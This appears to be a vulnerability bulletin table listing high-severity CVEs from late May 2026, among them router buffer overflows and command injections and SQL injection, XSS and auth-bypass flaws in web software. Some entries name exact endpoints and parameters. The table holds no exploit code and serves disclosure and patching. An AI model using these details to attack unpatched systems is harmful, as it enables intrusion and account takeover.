| Studio-42--elFinder | elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.68, an authenticated SQL injection vulnerability in the elFinder MySQL volume driver (elFinderVolumeMySQL) allows any logged-in user, including users with read-only access to the affected volume, to inject SQL through a crafted target file hash. Successful exploitation can lead to unauthorized data disclosure and denial of service. This vulnerability only affects installations configured to use the MySQL volume driver. This vulnerability is fixed in 2.1.68. | 2026-05-27 | 8.8 | CVE-2026-44521 |
| Stylemix--MasterStudy LMS | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Stylemix MasterStudy LMS masterstudy-lms-learning-management-system allows Blind SQL Injection.This issue affects MasterStudy LMS: from n/a through <= 3.7.29. | 2026-05-27 | 8.5 | CVE-2026-42730 |
| Synology--Active Backup for Business | A vulnerability in Active Backup for Business allows unauthorized remote attackers to read arbitrary files. | 2026-05-27 | 8.6 | CVE-2025-30028 |
| Synology--BeeDrive for desktop | Uncontrolled search path element vulnerability in OpenSSL DLL component in Synology BeeDrive for desktop before 1.3.2-13814 allows local users to execute arbitrary code via unspecified vectors. | 2026-05-27 | 7.8 | CVE-2023-52945 |
| Synology--BeeStation OS | Buffer copy without checking size of input ('Classic Buffer Overflow') vulnerability in AdminCenter in Synology BeeStation OS before 1.3.2-65648 allows remote attackers to execute arbitrary code via unspecified vectors. | 2026-05-27 | 9.8 | CVE-2025-12686 |
| Synology--C2 Identity Edge Server | An Exposed Dangerous Method or Function vulnerability in Synology C2 Identity Edge Server package in DSM before 1.76.0-0307 allows remote attackers to obtain user credentials from the edge server. | 2026-05-27 | 7.5 | CVE-2025-14713 |
| Synology--DiskStation Manager (DSM) | Improper check for unusual or exceptional conditions vulnerability in SSO in Synology DiskStation Manager (DSM) before 7.2.2-72806-5 and 7.3.1-86003-1 (7.2.1-69057 is not affected) allows remote attackers to bypass authentication with prior knowledge of the distinguished name (DN). | 2026-05-27 | 8.1 | CVE-2025-13392 |
| tainacan--Tainacan | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in tainacan Tainacan tainacan allows Blind SQL Injection.This issue affects Tainacan: from n/a through <= 1.0.3. | 2026-05-27 | 9.3 | CVE-2026-42740 |
| Talagasoft--MaxOn ERP | MaxOn ERP Software 8.x-9.x contains an SQL injection vulnerability that allows authenticated users to execute arbitrary SQL queries through the nomor, user, and jenis parameters in the log_activity function. Attackers can send POST requests to /index.php/user/log_activity with malicious SQL code in these parameters to extract sensitive database information including version and database names. | 2026-05-29 | 7.1 | CVE-2018-25392 |
| Tanium--Connect | Tanium addressed an unauthorized code execution vulnerability in Connect. | 2026-05-27 | 8.8 | CVE-2026-9207 |
| Tanium--Connect | Tanium addressed an unauthorized code execution vulnerability in Connect. | 2026-05-27 | 8.8 | CVE-2026-9208 |
| Tenda--F1202 | A vulnerability has been found in Tenda F1202 1.2.0.20(408). Affected is the function fromPPTPUserSetting of the file /goform/PPTPUserSetting. Such manipulation of the argument delno leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-05-25 | 8.8 | CVE-2026-9428 |
| Tenda--F1202 | A vulnerability was found in Tenda F1202 1.2.0.20(408). Affected by this vulnerability is the function formWrlExtraSet of the file /goform/WrlExtraSet. Performing a manipulation of the argument delno results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made public and could be used. | 2026-05-25 | 8.8 | CVE-2026-9429 |
| Tenda--F1202 | A vulnerability was determined in Tenda F1202 1.2.0.20(408). Affected by this issue is the function formGstDhcpSetSer of the file /goform/GstDhcpSetSerof. Executing a manipulation of the argument dips can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 8.8 | CVE-2026-9430 |
| Tenda--F1202 | A vulnerability was identified in Tenda F1202 1.2.0.20(408). This affects the function fromPptpUserAdd of the file /goform/PptpUserAdd. The manipulation of the argument opttype leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2026-05-25 | 8.8 | CVE-2026-9431 |
| Tenda--W12 | A flaw has been found in Tenda W12 3.0.0.7(4763). This affects the function cgistaKickOff of the file /bin/httpd. Executing a manipulation of the argument staMac can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. | 2026-05-31 | 8.8 | CVE-2026-10188 |
| Tenda--W12 | A vulnerability has been found in Tenda W12 3.0.0.7(4763). This vulnerability affects the function cgiSysTimeInfoSet of the file /bin/httpd. The manipulation of the argument sec leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2026-05-31 | 8.8 | CVE-2026-10189 |
| Tenda--W12 | A vulnerability was determined in Tenda W12 3.0.0.7(4763). Impacted is the function cgiWifiMacFilterSet of the file /bin/httpd. This manipulation of the argument wifiMacFilterSet.macList.mac causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-31 | 8.8 | CVE-2026-10191 |
| Tenda--W12 | A vulnerability was identified in Tenda W12 3.0.0.7(4763). The affected element is the function set_local_time_0 of the file /bin/httpd. Such manipulation of the argument Time leads to stack-based buffer overflow. The attack can be launched remotely. The exploit is publicly available and might be used. | 2026-05-31 | 8.8 | CVE-2026-10192 |
| Themeisle--Disable Comments for Any Post Types (Remove comments) | Authentication Bypass Using an Alternate Path or Channel vulnerability in Themeisle Disable Comments for Any Post Types (Remove comments) comments-plus allows Password Recovery Exploitation.This issue affects Disable Comments for Any Post Types (Remove comments): from n/a through <= 1.3.0. | 2026-05-27 | 7.1 | CVE-2026-42749 |
| thorsten--phpMyFAQ | phpMyFAQ before 4.1.3 contains an insecure direct object reference vulnerability in the admin API user password endpoint that allows authenticated administrators to change any user's password without authorization verification. An attacker with low-privilege admin credentials can escalate to SuperAdmin by modifying the userId parameter in the overwrite-password API request. | 2026-05-28 | 8.8 | CVE-2026-35671 |
| thorsten--phpMyFAQ | phpMyFAQ before 4.1.3 contains an authentication bypass vulnerability in the password reset endpoint that allows unauthenticated attackers to reset any user account password without token verification or email confirmation. Attackers can enumerate valid usernames, obtain plaintext passwords via email, and achieve complete account takeover including administrative access. | 2026-05-28 | 8.2 | CVE-2026-35675 |
| thorsten--phpMyFAQ | phpMyFAQ before 4.1.3 contains an unauthenticated password reset vulnerability in the user password update API endpoint that allows attackers to change account passwords without token validation. Attackers can enumerate valid username and email pairs and force immediate password changes by sending PUT requests to the /api/index.php/user/password/update endpoint, causing account disruption and invalidating legitimate user credentials. | 2026-05-28 | 8.2 | CVE-2026-35676 |
| thorsten--phpMyFAQ | phpMyFAQ before 4.1.3 contains an authentication bypass vulnerability in API v4.0 where the default empty api.apiClientToken allows unauthenticated users to create and modify FAQ entries. Attackers can send an empty x-pmf-token header to bypass token validation and inject malicious content via POST endpoints /api/v4.0/faq/create, /api/v4.0/category, and /api/v4.0/question. | 2026-05-28 | 7.5 | CVE-2026-35672 |
| Tiandy--Easy7 Integrated Management Platform | A vulnerability was found in Tiandy Easy7 Integrated Management Platform 7.17.0. This vulnerability affects unknown code of the file /Easy7/apps/WebService/GetDBDataEx.jsp. Performing a manipulation of the argument strTBName results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 7.3 | CVE-2026-9465 |
| Timo--Affiliate Super Assistent | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Timo Affiliate Super Assistent amazonsimpleadmin allows Stored XSS.This issue affects Affiliate Super Assistent: from n/a through <= 1.10.1. | 2026-05-27 | 7.1 | CVE-2026-42759 |
| tinymce--tinymce | TinyMCE is an open source rich text editor. Prior to 5.11.1, 7.9.3, and 8.5.1, there is a stored XSS vulnerability via unsanitized data-mce-* attributes (data-mce-href, data-mce-src, data-mce-style). Allows attackers to inject malicious values that override safe attributes during serialization, bypassing validation. This vulnerability is fixed in 5.11.1, 7.9.3, and 8.5.1. | 2026-05-28 | 8.7 | CVE-2026-47759 |
| tinymce--tinymce | TinyMCE is an open source rich text editor. From 6.8.0 to before 7.1.0, TinyMCE contains an XSS vulnerability caused by improper SVG namespace scope handling in the sanitizer. A crafted payload using nested elements can bypass attribute sanitization and execute arbitrary JavaScript. This vulnerability is fixed in 7.1.0. | 2026-05-28 | 8.7 | CVE-2026-47760 |
| tinymce--tinymce | TinyMCE is an open source rich text editor. Prior to 5.11.1, 7.9.3, and 8.5.1, there is a stored XSS vulnerability in the media plugin. Attackers can inject malicious scripts via crafted data-mce-* attributes, which are executed when content is rendered. Impacts users of TinyMCE with the media plugin enabled. This vulnerability is fixed in 5.11.1, 7.9.3, and 8.5.1. | 2026-05-28 | 8.7 | CVE-2026-47761 |
| tinymce--tinymce | TinyMCE is an open source rich text editor. Prior to 5.11.1, 7.9.3, and 8.5.1, there is a stored XSS vulnerability via forged mce:protected comments. Allows attackers to bypass sanitization and inject scripts that execute when content is restored. Impacts users who utilize the protect option. This vulnerability is fixed in 5.11.1, 7.9.3, and 8.5.1. | 2026-05-28 | 8.7 | CVE-2026-47762 |
| Totolink--A8000RU | A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected by this issue is the function setStaticDhcpRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument enable results in os command injection. The attack may be performed from remote. The exploit is now public and may be used. | 2026-05-25 | 9.8 | CVE-2026-9408 |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setWiFiAdvancedCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument bgProtection results in os command injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 9.8 | CVE-2026-9432 |
| Totolink--A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setMacFilterRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument enable causes os command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 9.8 | CVE-2026-9433 |
| Totolink--A8000RU | A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setWiFiWpsCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument wscDisabled leads to os command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-05-25 | 9.8 | CVE-2026-9434 |
| Totolink--A8000RU | A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setQosCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument enable results in os command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-05-25 | 9.8 | CVE-2026-9435 |
| Totolink--A8000RU | A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setL2tpServerCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument enable can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-05-25 | 9.8 | CVE-2026-9436 |
| Totolink--A8000RU | A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setOpenVpnCertGenerationCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument servername can lead to os command injection. The attack may be launched remotely. The exploit has been published and may be used. | 2026-05-25 | 9.8 | CVE-2026-9454 |
| Totolink--A8000RU | A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function UploadOpenVpnCert of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument FileName leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2026-05-25 | 9.8 | CVE-2026-9455 |
| Totolink--A8000RU | A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setOpenVpnCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument enabled results in os command injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-25 | 9.8 | CVE-2026-9456 |
| Totolink--A8000RU | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument FileName causes os command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 9.8 | CVE-2026-9457 |
| Totolink--A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setWanCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument enabled leads to os command injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2026-05-25 | 9.8 | CVE-2026-9458 |
| Totolink--A8000RU | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setIpQosRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument Comment causes os command injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 9.8 | CVE-2026-9475 |
| Totolink--A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument admpass leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2026-05-25 | 9.8 | CVE-2026-9476 |
| Totolink--A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setAccessDeviceCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument mac results in os command injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 9.8 | CVE-2026-9477 |
| Totolink--A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setParentalRules of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument enable can lead to os command injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 9.8 | CVE-2026-9478 |
| Totolink--N300RH | A vulnerability was detected in Totolink N300RH 6.1c.1353_B20190305. Affected by this issue is the function setWiFiBasicConfig of the file wireless.so of the component Web Management Interface. Performing a manipulation of the argument KeyStr results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-05-31 | 9.8 | CVE-2026-10187 |
| Totolink--N300RH | A vulnerability has been found in Totolink N300RH 6.1c.1353_B20190305. Affected is the function setPasswordCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument admpass leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-05-26 | 9.8 | CVE-2026-9543 |
| TRENDnet--TEW-432BRP | A vulnerability was determined in TRENDnet TEW-432BRP 3.10B20. Affected by this vulnerability is the function formSetRoute of the file /goform/formSetRoute. This manipulation of the argument ip/mask/gateway causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10062 |
| TRENDnet--TEW-432BRP | A vulnerability was identified in TRENDnet TEW-432BRP 3.10B20. Affected by this issue is the function formWPS of the file /goform/formWPS. Such manipulation of the argument peerPin leads to stack-based buffer overflow. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-29 | 8.8 | CVE-2026-10063 |
| TRENDnet--TEW-432BRP | A security vulnerability has been detected in TRENDnet TEW-432BRP 3.10B20. Impacted is the function formSetMACFilter of the file /goform/formSetMACFilter. The manipulation of the argument filter_name leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10119 |
| TRENDnet--TEW-432BRP | A vulnerability was detected in TRENDnet TEW-432BRP 3.10B20. The affected element is the function formSetFirewallRule of the file /goform/formSetFirewallRule. The manipulation of the argument firewall_name results in stack-based buffer overflow. The attack can be executed remotely. The exploit is now public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10120 |
| TRENDnet--TEW-432BRP | A flaw has been found in TRENDnet TEW-432BRP 3.10B20. The impacted element is the function formSetUrlFilter of the file /goform/formSetUrlFilter. This manipulation of the argument keyword_list/keyword causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10121 |
| TRENDnet--TEW-432BRP | A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20. This affects the function formSetProtocolFilter of the file /goform/formSetProtocolFilter. Such manipulation of the argument protocol_name leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10122 |
| TRENDnet--TEW-432BRP | A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. This impacts the function formSetDomainFilter of the file /goform/formSetDomainFilter. Performing a manipulation of the argument blocked_domain/permitted_domain/blocked_domain_list/permitted_domain_list results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-30 | 8.8 | CVE-2026-10123 |
| TRENDnet--TEW-432BRP | A security flaw has been discovered in TRENDnet TEW-432BRP 3.10B20. Affected is the function formPortFw of the file /goform/formPortFw. The manipulation of the argument server_name results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10158 |
| TRENDnet--TEW-432BRP | A weakness has been identified in TRENDnet TEW-432BRP 3.10B20. Affected by this vulnerability is the function formSysLog of the file /goform/formSysLog. This manipulation of the argument current_page causes stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10159 |
| TRENDnet--TEW-432BRP | A security vulnerability has been detected in TRENDnet TEW-432BRP 3.10B20. Affected by this issue is the function formSetEnableWizard of the file /goform/formSetEnableWizard. Such manipulation of the argument start_wizard leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10160 |
| TRENDnet--TEW-432BRP | A vulnerability was detected in TRENDnet TEW-432BRP 3.10B20. This affects the function formResetStatistic of the file /goform/formResetStatistic. Performing a manipulation of the argument status_statistic results in stack-based buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10161 |
| TRENDnet--TEW-432BRP | A flaw has been found in TRENDnet TEW-432BRP 3.10B20. This vulnerability affects the function formSetPassword of the file /goform/formSetPassword. Executing a manipulation of the argument webpage can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been published and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10162 |
| TRENDnet--TEW-432BRP | A flaw has been found in TRENDnet TEW-432BRP 3.10B20. This issue affects the function formSetWlanEncrypt of the file /goform/formSetWlanEncrypt. This manipulation of the argument webpage causes stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10179 |
| TRENDnet--TEW-432BRP | A vulnerability was found in TRENDnet TEW-432BRP 3.10B20. The affected element is the function formSysCmd of the file /goform/formSysCmd. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10181 |
| TRENDnet--TEW-432BRP | A vulnerability was identified in TRENDnet TEW-432BRP 3.10B20. This affects the function formWlanSetup of the file /goform/formWlanSetup. The manipulation of the argument enrollee leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-31 | 8.8 | CVE-2026-10183 |
| twentyhq--twenty | Twenty is an open source CRM. From 1.7.7 through 1.16.7, a critical Remote Code Execution (RCE) vulnerability exists in Twenty CRM via a chained SQL Injection and PostgreSQL COPY TO PROGRAM attack. If Postgres user is a super user then any authenticated user can execute arbitrary OS commands on the database server by injecting SQL through the unsanitized timeZone parameter in the REST API groupBy endpoint. The timeZone field within the group_by query parameter is directly interpolated into a raw SQL expression using JavaScript template literals without any parameterization, validation, or escaping. This affects engine/api/graphql/graphql-query-runner/group-by/resolvers/utils/get-group-by-expression.util.ts. | 2026-05-26 | 9.9 | CVE-2026-46624 |
| twentyhq--twenty | Twenty is an open source CRM. In 1.18.0 and earlier, the file serving endpoints in Twenty CRM at /files/* and /file/:fileFolder/:id serve uploaded files using fileStream.pipe(res) without setting any Content-Type, Content-Disposition, or X-Content-Type-Options response headers. This allows an authenticated attacker to upload an HTML file containing JavaScript, which will be rendered by the victim's browser in the context of the Twenty CRM domain when accessed - enabling session hijacking, account takeover, and data theft. | 2026-05-26 | 8.7 | CVE-2026-44729 |
| uniget-org--cli | uniget is a universal installer and updater for (container) tools. Prior to 0.27.1, a command injection vulnerability exists in uniget due to unsafe execution of the check field from metadata files using /bin/bash -c. Because the check field is loaded directly from untrusted JSON metadata without validation or sanitization, an attacker can craft malicious metadata that executes arbitrary shell commands on the victim's system when common uniget operations such as describe, install, update, or inspect are performed. This vulnerability can lead to arbitrary code execution with the privileges of the user running uniget. This vulnerability is fixed in 0.27.1. | 2026-05-27 | 7.8 | CVE-2026-45152 |
| Unlimited Elements--Unlimited Elements For Elementor | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Unlimited Elements For Elementor allows Blind SQL Injection. This issue affects Unlimited Elements For Elementor: from n/a through 2.0.8. | 2026-05-25 | 8.5 | CVE-2026-48837 |
| Usagi-org--ai-goofish-monitor | Usagi-org ai-goofish-monitor contains an unauthenticated arbitrary file read vulnerability in the GET /api/prompts/{filename} endpoint on Windows deployments that allows unauthenticated remote attackers to read arbitrary files by supplying absolute Windows paths or backslash-based traversal sequences. Attackers can bypass the incomplete path traversal guard, which only blocks forward slashes and '..', by providing absolute paths such as Windows system file locations, causing os.path.join to discard the intended prompts directory prefix and expose files accessible to the application process. | 2026-05-28 | 7.5 | CVE-2026-10044 |
| UTT--HiPER 1200GW | A security flaw has been discovered in UTT HiPER 1200GW up to 2.5.3-170306. This impacts the function strcpy of the file /goform/setSysAdm of the component Web Management Interface. The manipulation of the argument sysAdmUser/sysAdmPass results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-27 | 8.8 | CVE-2026-9627 |
| UTT--HiPER 1200GW | A weakness has been identified in UTT HiPER 1200GW up to 2.5.3-170306. Affected is an unknown function of the file /goform/formPptpClientConfig of the component Web Management Interface. This manipulation of the argument PPTP server address/username/password/tunnel name causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-27 | 8.8 | CVE-2026-9628 |
| UTT--HiPER 1250GW | A vulnerability was detected in UTT HiPER 1250GW up to 3.2.7-210907-180535. Affected by this vulnerability is the function strcpy of the file /goform/formConfigFastDirectionW of the component Web Management Interface. Performing a manipulation of the argument Profile results in stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-05-27 | 8.8 | CVE-2026-9631 |
| UTT--HiPER 1250GW | A flaw has been found in UTT HiPER 1250GW up to 3.2.7-210907-180535. Affected by this issue is the function strcpy of the file /goform/formGroupConfig of the component Web Management Interface. Executing a manipulation of the argument Profile can lead to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-05-27 | 8.8 | CVE-2026-9632 |
| verbb--formie | Formie is a Craft CMS plugin for creating forms. Prior to 2.2.20 and 3.1.24, unauthenticated users could submit crafted values into Hidden fields (with Default value → Custom) that were evaluated as Twig during submission handling, which could lead to serious compromise of the Craft site (depending on template/sandbox behavior). This vulnerability is fixed in 2.2.20 and 3.1.24. | 2026-05-29 | 9.8 | CVE-2026-45697 |
| veronalabs--SlimStat Analytics | The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'User-Agent' header in all versions up to, and including, 5.4.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The show_complete_user_agent_tooltip setting must be explicitly enabled by an administrator (disabled by default) for the stored payload to be rendered and executed. | 2026-05-28 | 7.2 | CVE-2026-7634 |
| VideoWhisper.com--Broadcast Live Video | Improper Control of Generation of Code ('Code Injection') vulnerability in VideoWhisper.Com Broadcast Live Video allows Code Injection. This issue affects Broadcast Live Video: from n/a before 7.1.3. | 2026-05-25 | 7.2 | CVE-2026-24937 |
| WC Lovers--WCFM Membership | Missing Authorization vulnerability in WC Lovers WCFM Membership wc-multivendor-membership allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WCFM Membership: from n/a through <= 2.11.10. | 2026-05-27 | 7.3 | CVE-2026-42753 |
| WebPros--Comet Backup | Insufficient character filtering in backup agent signing module on Comet Backup server allows authenticated tenant administrator to execute an arbitrary code on behalf of a privileged user on the affected server and connected devices. | 2026-05-28 | 9.1 | CVE-2026-32999 |
| WebPros--Plesk | Plesk contains an XPath injection vulnerability in the APS Application Catalog search functionality, where user-supplied input is interpolated into XPath queries without proper sanitization. This allows an authenticated, low-privileged user to execute arbitrary operating system commands on the server, resulting in local privilege escalation. | 2026-05-29 | 10 | CVE-2026-44962 |
| WebToffee--Smart Coupons for WooCommerce | Missing Authorization vulnerability in WebToffee Smart Coupons for WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Smart Coupons for WooCommerce: from n/a before 2.3.0. | 2026-05-25 | 7.5 | CVE-2026-45438 |
| Winmtr--WinMTR | WinMTR 0.91 contains a denial of service vulnerability that allows attackers to crash the application by sending a malformed payload file containing a large buffer of repeated characters. Attackers can create a specially crafted input file with 238 bytes of data to trigger a buffer overflow condition that causes the application to crash. | 2026-05-30 | 7.5 | CVE-2018-25426 |
| wordplus--BP Better Messages | Authorization Bypass Through User-Controlled Key vulnerability in wordplus BP Better Messages bp-better-messages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BP Better Messages: from n/a through <= 2.14.16. | 2026-05-27 | 7.5 | CVE-2026-42736 |
| WPify--WPify Woo Czech | Unrestricted Upload of File with Dangerous Type vulnerability in WPify WPify Woo Czech wpify-woo allows Upload a Web Shell to a Web Server.This issue affects WPify Woo Czech: from n/a through <= 5.4.1. | 2026-05-27 | 9.9 | CVE-2026-42748 |
| WPTravel--WP Travel Pro | The WP Travel Pro plugin for WordPress is vulnerable to arbitrary user deletion via the /wp-json/wp-travel/v1/travel-guide/{user_id} REST API endpoint in all versions up to, and including, 10.6.0. This is due to the check_permission() callback unconditionally returning true and the Database::delete() method passing the user ID directly to wp_delete_user() without any role validation. This makes it possible for unauthenticated attackers to delete arbitrary user accounts, including those of administrators. | 2026-05-29 | 9.1 | CVE-2026-4290 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, there is a classic shell-metacharacter injection. The YPTSocket notification branch in plugin/Live/on_publish.php builds an execAsync() command line by string concatenation, single-quoting each argument but never calling escapeshellarg(). A ' in any of the three interpolated values ($users_id, $m3u8, $obj->liveTransmitionHistory_id) closes the quoted token and lets the attacker append arbitrary commands. | 2026-05-29 | 8.8 | CVE-2026-45578 |
